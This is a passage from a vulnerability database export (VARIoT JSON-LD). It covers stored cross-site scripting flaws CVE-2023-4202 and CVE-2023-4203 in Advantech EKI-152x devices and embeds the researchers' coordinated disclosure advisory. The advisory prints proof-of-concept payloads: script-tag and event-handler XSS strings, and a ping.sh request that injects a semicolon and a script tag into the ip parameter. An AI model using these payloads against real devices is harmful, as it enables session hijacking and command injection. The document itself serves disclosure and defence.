"db": "PACKETSTORM",
"id": "172307"
},
{
"db": "NVD",
"id": "CVE-2023-2574"
},
{
"db": "CNNVD",
"id": "CNNVD-202305-378"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULMON",
"id": "CVE-2023-2574"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-009948"
},
{
"db": "PACKETSTORM",
"id": "172307"
},
{
"db": "NVD",
"id": "CVE-2023-2574"
},
{
"db": "CNNVD",
"id": "CNNVD-202305-378"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-05-08T00:00:00",
"db": "VULMON",
"id": "CVE-2023-2574"
},
{
"date": "2023-12-07T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2023-009948"
},
{
"date": "2023-05-12T16:24:23",
"db": "PACKETSTORM",
"id": "172307"
},
{
"date": "2023-05-08T13:15:09.790000",
"db": "NVD",
"id": "CVE-2023-2574"
},
{
"date": "2023-05-08T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202305-378"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-05-08T00:00:00",
"db": "VULMON",
"id": "CVE-2023-2574"
},
{
"date": "2023-12-07T04:51:00",
"db": "JVNDB",
"id": "JVNDB-2023-009948"
},
{
"date": "2023-05-12T18:15:09.703000",
"db": "NVD",
"id": "CVE-2023-2574"
},
{
"date": "2023-05-15T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202305-378"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202305-378"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Command injection vulnerability in multiple Advantech products",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-009948"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "command injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202305-378"
}
],
"trust": 0.6
}
}
var-202308-2103
Vulnerability from variot
Advantech EKI-1524, EKI-1522, EKI-1521 devices through 1.21 are affected by a Stored Cross-Site Scripting vulnerability, which can be triggered by authenticated users in the ping tool of the web-interface. St. P\xf6lten UAS
title| Multiple XSS in Advantech
product| Advantech EKI-1524-CE series, EKI-1522 series,
| EKI-1521 series
vulnerable version| <=1.21 (CVE-2023-4202), <=1.24 (CVE-2023-4203) fixed version| 1.26 CVE number| CVE-2023-4202, CVE-2023-4203 impact| Medium homepage| https://advantech.com found| 2023-05-04 by| R. Haas, A. Resanovic, T. Etzenberger, M. Bineder | This vulnerability was discovery during research at | St. P\xf6lten UAS, supported and coordinated by CyberDanube. | | https://fhstp.ac.at | https://cyberdanube.com
Vendor description
\x93Advantech\x92s corporate vision is to enable an intelligent planet. The company is a global leader in the fields of IoT intelligent systems and embedded platforms. To embrace the trends of IoT, big data, and artificial intelligence, Advantech promotes IoT hardware and software solutions with the Edge Intelligence WISE-PaaS core to assist business partners and clients in connecting their industrial chains. Advantech is also working with business partners to co-create business ecosystems that accelerate the goal of industrial intelligence.\x94
Source: https://www.advantech.com/en/about
Vulnerable versions
EKI-1524-CE series / 1.21 (CVE-2023-4202) EKI-1522-CE series / 1.21 (CVE-2023-4202) EKI-1521-CE series / 1.21 (CVE-2023-4202)
EKI-1524-CE series / 1.24 (CVE-2023-4203) EKI-1522-CE series / 1.24 (CVE-2023-4203) EKI-1521-CE series / 1.24 (CVE-2023-4203)
Vulnerability overview
1) Stored Cross-Site Scripting (XSS) (CVE-2023-4202, CVE-2023-4203) Two stored cross-site scripting vulnerabilities has been identified in the firmware of the device. The first XSS was identified in the "Device Name" field and the second XSS was found in the "Ping" tool. This can be exploited in the context of a victim's session.
1.1) Stored XSS in Device Name CVE-2023-4202 The first vulnerability can be triggerd by setting the device name ("System->Device Name") to the following value: ">
This code prints out the cached cookies to the screen.
1.2) Stored XSS in Ping Function CVE-2023-4203 The second XSS vulnerability can be found in "Tools->Ping". The following GET request prints the current cached cookies of a user's session to the screen.
http://$IP/cgi-bin/ping.sh?random_num=2013&ip=172.16.0.141%3b%20&size=56&count=1&interface=eth0&_=1682793104513
An alternative to the used payload is using "onmouseover" event tags. In this case it prints out the number "1337": " onmousemove="alert(1337)"
The vulnerability was manually verified on an emulated device by using the MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).
Solution
Upgrade to the newest available firmware.
Workaround
None.
Recommendation
Advantech customers are advised to upgrade the firware to the latest available version.
Contact Timeline
2023-05-16: Contacting vendor via security contact. 2023-05-24: Contact stated that issue 1.1) is solved after firmware v1.21. The contact is trying to reproduce issue 1.2; Gave advice to reproduce issue. 2023-05-25: Contact stated that new firmware should resolve the issue. 2023-06-03: Sent new payload to the vendor. 2023-06-05: Vendor asked for clarification; Sent further explaination to the contact; Vendor contact said he knows a solution. 2023-06-22: Asked for an update; Contact stated that the beta firmware should resolve the issues. 2023-06-27: Asked for the release date. 2023-07-04: Contact stated, that they are currently doing QA tests. 2023-07-06: Asked if issue 1.1 is really resolved to be released; Vendor stated that it can be published. 2023-07-17: Assigned CVE numbers for the issues. Asked for an update. 2023-07-18: Vendor contact stated that the firmware will be released end of July. 2023-08-07: Asked contact for the new firmware version. 2023-08-08: Received version 1.26 as the official released firmware with fixes. Coordinated release of security advisory.
Web: https://www.fhstp.ac.at/ Twitter: https://twitter.com/fh_stpoelten Mail: mis at fhstp dot ac dot at
EOF T. Weber / @2023
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202308-2103",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "eki-1524",
"scope": "lte",
"trust": 1.0,
"vendor": "advantech",
"version": "1.24"
},
{
"model": "eki-1522",
"scope": "lte",
"trust": 1.0,
"vendor": "advantech",
"version": "1.24"
},
{
"model": "eki-1521",
"scope": "lte",
"trust": 1.0,
"vendor": "advantech",
"version": "1.24"
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2023-4203"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:advantech:eki-1524_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "1.24",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:advantech:eki-1524:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:advantech:eki-1522_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "1.24",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:advantech:eki-1522:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:advantech:eki-1521_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "1.24",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:advantech:eki-1521:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2023-4203"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "T. Weber, A. Resanovic, T. Etzenberger, M. Bineder, R. Haas",
"sources": [
{
"db": "PACKETSTORM",
"id": "174153"
}
],
"trust": 0.1
},
"cve": "CVE-2023-4203",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.3,
"impactScore": 2.7,
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "office@cyberdanube.com",
"availabilityImpact": "HIGH",
"baseScore": 9.0,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.3,
"impactScore": 6.0,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H",
"version": "3.1"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2023-4203",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "office@cyberdanube.com",
"id": "CVE-2023-4203",
"trust": 1.0,
"value": "CRITICAL"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2023-4203"
},
{
"db": "NVD",
"id": "CVE-2023-4203"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Advantech EKI-1524, EKI-1522, EKI-1521 devices through 1.21 are affected by a Stored Cross-Site Scripting vulnerability, which can be triggered by authenticated users in the ping tool of the web-interface. St. P\\xf6lten UAS\n-------------------------------------------------------------------------------\n title| Multiple XSS in Advantech\n product| Advantech EKI-1524-CE series, EKI-1522 series,\n | EKI-1521 series\n vulnerable version| \u003c=1.21 (CVE-2023-4202), \u003c=1.24 (CVE-2023-4203)\n fixed version| 1.26\n CVE number| CVE-2023-4202, CVE-2023-4203\n impact| Medium\n homepage| https://advantech.com\n found| 2023-05-04\n by| R. Haas, A. Resanovic, T. Etzenberger, M. Bineder\n | This vulnerability was discovery during research at\n | St. P\\xf6lten UAS, supported and coordinated by CyberDanube. \n |\n | https://fhstp.ac.at | https://cyberdanube.com\n-------------------------------------------------------------------------------\n\nVendor description\n-------------------------------------------------------------------------------\n\\x93Advantech\\x92s corporate vision is to enable an intelligent planet. The company\nis a global leader in the fields of IoT intelligent systems and embedded\nplatforms. To embrace the trends of IoT, big data, and artificial intelligence,\nAdvantech promotes IoT hardware and software solutions with the Edge\nIntelligence WISE-PaaS core to assist business partners and clients in\nconnecting their industrial chains. Advantech is also working with business\npartners to co-create business ecosystems that accelerate the goal of\nindustrial intelligence.\\x94\n\nSource: https://www.advantech.com/en/about\n\n\nVulnerable versions\n-------------------------------------------------------------------------------\nEKI-1524-CE series / 1.21 (CVE-2023-4202)\nEKI-1522-CE series / 1.21 (CVE-2023-4202)\nEKI-1521-CE series / 1.21 (CVE-2023-4202)\n\nEKI-1524-CE series / 1.24 (CVE-2023-4203)\nEKI-1522-CE series / 1.24 (CVE-2023-4203)\nEKI-1521-CE series / 1.24 (CVE-2023-4203)\n\n\nVulnerability overview\n-------------------------------------------------------------------------------\n1) Stored Cross-Site Scripting (XSS) (CVE-2023-4202, CVE-2023-4203)\nTwo stored cross-site scripting vulnerabilities has been identified in the\nfirmware of the device. The first XSS was identified in the \"Device Name\" field\nand the second XSS was found in the \"Ping\" tool. This can be exploited in the\ncontext of a victim\u0027s session. \n\n1.1) Stored XSS in Device Name CVE-2023-4202\nThe first vulnerability can be triggerd by setting the device name\n(\"System-\u003eDevice Name\") to the following value:\n\"\u003e\u003cscript\u003ealert(\"document.cookie\")\u003c/script\u003e\n\nThis code prints out the cached cookies to the screen. \n\n1.2) Stored XSS in Ping Function CVE-2023-4203\nThe second XSS vulnerability can be found in \"Tools-\u003ePing\". The following GET\nrequest prints the current cached cookies of a user\u0027s session to the screen. \n\nhttp://$IP/cgi-bin/ping.sh?random_num=2013\u0026ip=172.16.0.141%3b%20\u003cscript\u003ealert(1)\u003c/script\u003e\u0026size=56\u0026count=1\u0026interface=eth0\u0026_=1682793104513\n\nAn alternative to the used payload is using \"onmouseover\" event tags. In this\ncase it prints out the number \"1337\":\n\" onmousemove=\"alert(1337)\"\n\nThe vulnerability was manually verified on an emulated device by using the\nMEDUSA scalable firmware runtime (https://medusa.cyberdanube.com). \n\n\nSolution\n-------------------------------------------------------------------------------\nUpgrade to the newest available firmware. \n\nWorkaround\n-------------------------------------------------------------------------------\nNone. \n\n\nRecommendation\n-------------------------------------------------------------------------------\nAdvantech customers are advised to upgrade the firware to the latest\navailable version. \n\n\nContact Timeline\n-------------------------------------------------------------------------------\n2023-05-16: Contacting vendor via security contact. \n2023-05-24: Contact stated that issue 1.1) is solved after firmware v1.21. \n The contact is trying to reproduce issue 1.2; Gave advice to\n reproduce issue. \n2023-05-25: Contact stated that new firmware should resolve the issue. \n2023-06-03: Sent new payload to the vendor. \n2023-06-05: Vendor asked for clarification; Sent further explaination to the\n contact; Vendor contact said he knows a solution. \n2023-06-22: Asked for an update; Contact stated that the beta firmware should\n resolve the issues. \n2023-06-27: Asked for the release date. \n2023-07-04: Contact stated, that they are currently doing QA tests. \n2023-07-06: Asked if issue 1.1 is really resolved to be released; Vendor stated\n that it can be published. \n2023-07-17: Assigned CVE numbers for the issues. Asked for an update. \n2023-07-18: Vendor contact stated that the firmware will be released end of\n July. \n2023-08-07: Asked contact for the new firmware version. \n2023-08-08: Received version 1.26 as the official released firmware with fixes. \n Coordinated release of security advisory. \n\n\n\nWeb: https://www.fhstp.ac.at/\nTwitter: https://twitter.com/fh_stpoelten\nMail: mis at fhstp dot ac dot at\n\nEOF T. Weber / @2023\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2023-4203"
},
{
"db": "PACKETSTORM",
"id": "174153"
}
],
"trust": 0.99
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2023-4203",
"trust": 1.1
},
{
"db": "PACKETSTORM",
"id": "174153",
"trust": 1.1
}
],
"sources": [
{
"db": "PACKETSTORM",
"id": "174153"
},
{
"db": "NVD",
"id": "CVE-2023-4203"
}
]
},
"id": "VAR-202308-2103",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 1.0
},
"last_update_date": "2023-12-18T13:41:18.278000Z",
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2023-4203"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.0,
"url": "http://packetstormsecurity.com/files/174153/advantech-eki-1524-ce-eki-1522-eki-1521-cross-site-scripting.html"
},
{
"trust": 1.0,
"url": "http://seclists.org/fulldisclosure/2023/aug/13"
},
{
"trust": 1.0,
"url": "https://cyberdanube.com/en/en-st-polten-uas-multiple-vulnerabilities-in-advantech-eki-15xx-series/"
},
{
"trust": 0.1,
"url": "https://fhstp.ac.at"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-4203"
},
{
"trust": 0.1,
"url": "http://$ip/cgi-bin/ping.sh?random_num=2013\u0026ip=172.16.0.141%3b%20\u003cscript\u003ealert(1)\u003c/script\u003e\u0026size=56\u0026count=1\u0026interface=eth0\u0026_=1682793104513"
},
{
"trust": 0.1,
"url": "https://cyberdanube.com"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-4202"
},
{
"trust": 0.1,
"url": "https://twitter.com/fh_stpoelten"
},
{
"trust": 0.1,
"url": "https://www.advantech.com/en/about"
},
{
"trust": 0.1,
"url": "https://advantech.com"
},
{
"trust": 0.1,
"url": "https://medusa.cyberdanube.com)."
},
{
"trust": 0.1,
"url": "https://www.fhstp.ac.at/"
}
],
"sources": [
{
"db": "PACKETSTORM",
"id": "174153"
},
{
"db": "NVD",
"id": "CVE-2023-4203"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "PACKETSTORM",
"id": "174153"
},
{
"db": "NVD",
"id": "CVE-2023-4203"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-08-14T17:13:30",
"db": "PACKETSTORM",
"id": "174153"
},
{
"date": "2023-08-08T11:15:12.143000",
"db": "NVD",
"id": "CVE-2023-4203"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-08-14T19:15:14.627000",
"db": "NVD",
"id": "CVE-2023-4203"
}
]
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Advantech EKI-1524-CE / EKI-1522 / EKI-1521 Cross Site Scripting",
"sources": [
{
"db": "PACKETSTORM",
"id": "174153"
}
],
"trust": 0.1
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "xss",
"sources": [
{
"db": "PACKETSTORM",
"id": "174153"
}
],
"trust": 0.1
}
}
var-202308-2104
Vulnerability from variot
Advantech EKI-1524, EKI-1522, EKI-1521 devices through 1.21 are affected by a Stored Cross-Site Scripting vulnerability, which can be triggered by authenticated users in the device name field of the web-interface. St. P\xf6lten UAS
title| Multiple XSS in Advantech
product| Advantech EKI-1524-CE series, EKI-1522 series,
| EKI-1521 series
vulnerable version| <=1.21 (CVE-2023-4202), <=1.24 (CVE-2023-4203) fixed version| 1.26 CVE number| CVE-2023-4202, CVE-2023-4203 impact| Medium homepage| https://advantech.com found| 2023-05-04 by| R. Haas, A. Resanovic, T. Etzenberger, M. Bineder | This vulnerability was discovery during research at | St. P\xf6lten UAS, supported and coordinated by CyberDanube. | | https://fhstp.ac.at | https://cyberdanube.com
Vendor description
\x93Advantech\x92s corporate vision is to enable an intelligent planet. The company is a global leader in the fields of IoT intelligent systems and embedded platforms. To embrace the trends of IoT, big data, and artificial intelligence, Advantech promotes IoT hardware and software solutions with the Edge Intelligence WISE-PaaS core to assist business partners and clients in connecting their industrial chains. Advantech is also working with business partners to co-create business ecosystems that accelerate the goal of industrial intelligence.\x94
Source: https://www.advantech.com/en/about
Vulnerable versions
EKI-1524-CE series / 1.21 (CVE-2023-4202) EKI-1522-CE series / 1.21 (CVE-2023-4202) EKI-1521-CE series / 1.21 (CVE-2023-4202)
EKI-1524-CE series / 1.24 (CVE-2023-4203) EKI-1522-CE series / 1.24 (CVE-2023-4203) EKI-1521-CE series / 1.24 (CVE-2023-4203)
Vulnerability overview
1) Stored Cross-Site Scripting (XSS) (CVE-2023-4202, CVE-2023-4203) Two stored cross-site scripting vulnerabilities has been identified in the firmware of the device. The first XSS was identified in the "Device Name" field and the second XSS was found in the "Ping" tool. This can be exploited in the context of a victim's session.
1.1) Stored XSS in Device Name CVE-2023-4202 The first vulnerability can be triggerd by setting the device name ("System->Device Name") to the following value: ">
This code prints out the cached cookies to the screen.
1.2) Stored XSS in Ping Function CVE-2023-4203 The second XSS vulnerability can be found in "Tools->Ping". The following GET request prints the current cached cookies of a user's session to the screen.
http://$IP/cgi-bin/ping.sh?random_num=2013&ip=172.16.0.141%3b%20&size=56&count=1&interface=eth0&_=1682793104513
An alternative to the used payload is using "onmouseover" event tags. In this case it prints out the number "1337": " onmousemove="alert(1337)"
The vulnerability was manually verified on an emulated device by using the MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).
Solution
Upgrade to the newest available firmware.
Workaround
None.
Recommendation
Advantech customers are advised to upgrade the firware to the latest available version.
Contact Timeline
2023-05-16: Contacting vendor via security contact. 2023-05-24: Contact stated that issue 1.1) is solved after firmware v1.21. The contact is trying to reproduce issue 1.2; Gave advice to reproduce issue. 2023-05-25: Contact stated that new firmware should resolve the issue. 2023-06-03: Sent new payload to the vendor. 2023-06-05: Vendor asked for clarification; Sent further explaination to the contact; Vendor contact said he knows a solution. 2023-06-22: Asked for an update; Contact stated that the beta firmware should resolve the issues. 2023-06-27: Asked for the release date. 2023-07-04: Contact stated, that they are currently doing QA tests. 2023-07-06: Asked if issue 1.1 is really resolved to be released; Vendor stated that it can be published. 2023-07-17: Assigned CVE numbers for the issues. Asked for an update. 2023-07-18: Vendor contact stated that the firmware will be released end of July. 2023-08-07: Asked contact for the new firmware version. 2023-08-08: Received version 1.26 as the official released firmware with fixes. Coordinated release of security advisory.
Web: https://www.fhstp.ac.at/ Twitter: https://twitter.com/fh_stpoelten Mail: mis at fhstp dot ac dot at
EOF T. Weber / @2023
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202308-2104",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "eki-1524",
"scope": "lte",
"trust": 1.0,
"vendor": "advantech",
"version": "1.21"
},
{
"model": "eki-1522",
"scope": "lte",
"trust": 1.0,
"vendor": "advantech",
"version": "1.21"
},
{
"model": "eki-1521",
"scope": "lte",
"trust": 1.0,
"vendor": "advantech",
"version": "1.21"
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2023-4202"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:advantech:eki-1524_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "1.21",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:advantech:eki-1524:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:advantech:eki-1522_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "1.21",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:advantech:eki-1522:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:advantech:eki-1521_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "1.21",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:advantech:eki-1521:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2023-4202"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "T. Weber, A. Resanovic, T. Etzenberger, M. Bineder, R. Haas",
"sources": [
{
"db": "PACKETSTORM",
"id": "174153"
}
],
"trust": 0.1
},
"cve": "CVE-2023-4202",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
